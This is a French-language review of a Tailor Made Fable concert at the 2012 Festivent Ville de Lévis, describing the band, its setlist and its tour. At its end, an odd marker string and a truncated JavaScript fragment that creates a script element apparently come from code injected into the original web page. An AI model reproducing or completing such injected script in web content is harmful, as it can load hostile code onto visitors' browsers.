Une belle journée sous le soleil nous attendait hier, sur le site de cette 30ième édition de FESTIVENT VILLE DE LÉVIS, à St-Jean-Chrysostome. En attendant l'arrivée de HEDLEY, qui se trouve à être présentement l'un des groupes les plus populaires au Canada, laissons place au groupe TAILOR MADE FABLE qui commence à faire beaucoup parler de lui tant au Québec, aux États-Unis qu’en Angleterre.

 C’est sur le coup de 20h que la formation composée de Rémi Chassé ( voix, guitare, piano), Mike Normand ( guitare,voix), Hubert Maheux (guitare, voix), Matt Boulanger (basse, voix) et P-E Beaudoin ( batterie, voix) est montée sur les planches de la scène Loto-Québec. TAILOR MADE FABLE nous a  présenté le spectacle de sa tournée EMERGE AND SEE. Le groupe de la Beauce formé en 2004 a débuté la soirée avec un aplomb et un enthousiasme éloquent avec leur chanson '' It Could Be Now ''. Avant de poursuivre avec ‘’ Man And His Roots'' et ''Plastic Stars'', ils nous ont souhaité la  bienvenue et ont exprimé leur joie d’être ici.

 Devant une foule composée principalement de jeunes filles, ces artistes n'ont eu aucune difficulté à séduire chacune d'entre elles en plus de chacun des spectateurs, hommes et femmes, présents sur le terrain. En plus des chansons ‘’ Freeze Thi

s Night’’, ‘’ I Will Not To Go’’, ‘’ Starting Over’’ ‘’ You Own Excuses’’ et ‘’ Whole Lotta Love’’ ils nous ont également offert quelques '' Medley'' dont l'un composé de '' Photograph'' de Def Leppard et ‘’Black Or White’’ de Michael Jackson. Nous avons également eu droit a un solo de batterie de la part de P-E Beaudoin qui, je vous l’assure, use tout aussi bien de sa voix que de ses baquettes.

 TAILOR MADE FABLE c’est de la musique rock teinté de pop qui coule avec des voix solides et bien ancrées aux textes. Les arrangements musicaux incluant parfois du piano nous entraînent simplement et doucement dans leur univers musical. Rappellons que la formation a remporté le 1er prix du Festival Envol et Macadam de Québec en 2007, ce qui les amener à se produire devant 4000 personnes en Angleterre. En plus de son récent passage à Woodstock en Beauce, ils poursuivent leur série de spectacle dans le cadre de leur tournée et seront à St-Émile ce soir, le 3 Août 2012.  Consultez leur site internet pour savoir quand ils s’arrêteront près de chez vous.

 Tout comme le groupe, je vous invite a aller visionner leur vidéoclip officiel de ‘’Monday Morning’’ sur YOUTUBE.

Les photos du concert ICI

zp8497586rq

var d=document;var s=d.createElement(‘script’);